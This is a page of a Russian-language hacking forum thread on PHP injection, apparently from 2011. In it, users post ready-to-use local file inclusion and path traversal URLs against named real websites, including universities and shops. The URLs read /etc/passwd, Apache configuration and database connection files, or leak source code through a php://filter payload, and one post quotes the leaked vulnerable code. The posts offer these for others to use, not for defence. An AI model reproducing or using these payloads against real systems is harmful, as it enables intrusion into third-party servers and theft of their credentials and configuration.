HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 123 из 143 « Первая < 2373113 119 120 121 122 123 124 125 126 127 133 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.03.2011, 21:18
Lestatkiy
Познающий
Регистрация: 27.09.2010
Сообщений: 50
Провел на форуме:
15203

Репутация: 5
По умолчанию
http://www.dailymail.com/ap/ApWorld/201103181127?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
 
Ответить с цитированием

  #2  
Старый 21.03.2011, 03:00
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию
http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index

PHP код:
[COLOR="#000000"]
[COLOR="#0000BB"]';



/*

Check for the page variable. If it is empty or

uninitialized, set it value to the default or

home page.

*/



[/COLOR][COLOR="#007700"]if ( isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) || !empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) )

{



[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];





}else{

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"home"[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"http"[/COLOR][COLOR="#007700"]);







if ([/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]// Include the specified page.

//include(realpath(basename($page)));

[/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);

}

else {

die([/COLOR][COLOR="#DD0000"]"Possible PHP Injection Attack"[/COLOR][COLOR="#007700"]);

}



[/COLOR][COLOR="#FF8000"]//echo "";

// Diplay the footer

[/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"footer.php"[/COLOR][COLOR="#007700"]);

?

[/COLOR][/COLOR] 
интересная протекция )
 
Ответить с цитированием

  #3  
Старый 21.03.2011, 17:13
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию
читалюга

http://www.vintagetoys.com/help.php?template=../../../../../../home/twinkles/public_html/dbconnection.php%00

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
 
Ответить с цитированием

  #4  
Старый 02.04.2011, 21:33
ta-kyn
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381

Репутация: 16
По умолчанию
[IP 208.125.234.183]

Код:
http://web2.paulsmiths.edu/PAGE=../etc/passwd
 
Ответить с цитированием

  #5  
Старый 18.04.2011, 10:38
LiRvD082
Новичок
Регистрация: 04.10.2009
Сообщений: 1
Провел на форуме:
14740

Репутация: 0
По умолчанию
http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00

Пользуйтесь на здоровье!
 
Ответить с цитированием

  #6  
Старый 23.04.2011, 23:43
eclipse
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
Провел на форуме:
30555

Репутация: 85
По умолчанию
LFI :: kruta.ee :: PR - 3

Код:
_http://www.kruta.ee/main.php?lang=est&pg=../../../../../../data03/virt6224/domeenid/www.kruta.ee/htdocs/func
 
Ответить с цитированием

  #7  
Старый 12.05.2011, 00:30
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию
Код:
http://people.clarkson.edu/~williaem/ew/home2.php?file=/etc/passwd
allow_url_include = on + никакой фильтрации
 
Ответить с цитированием

  #8  
Старый 12.05.2011, 18:18
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию
http://www.ub.edu/histeco/eng/membre.php?page=../../../../../etc/passwd
 
Ответить с цитированием

  #9  
Старый 14.05.2011, 17:26
SHiNiGaMi
Познающий
Регистрация: 03.01.2010
Сообщений: 42
Провел на форуме:
162143

Репутация: 3
По умолчанию
http://jedit.org/index.php?page=/etc/passwd%00
 
Ответить с цитированием

  #10  
Старый 28.05.2011, 00:20
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию
http://www.skincarenet.org/news.php?include=../../../../../etc/passwd%00
 
Ответить с цитированием
Ответ
Страница 123 из 143 « Первая < 2373113 119 120 121 122 123 124 125 126 127 133 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.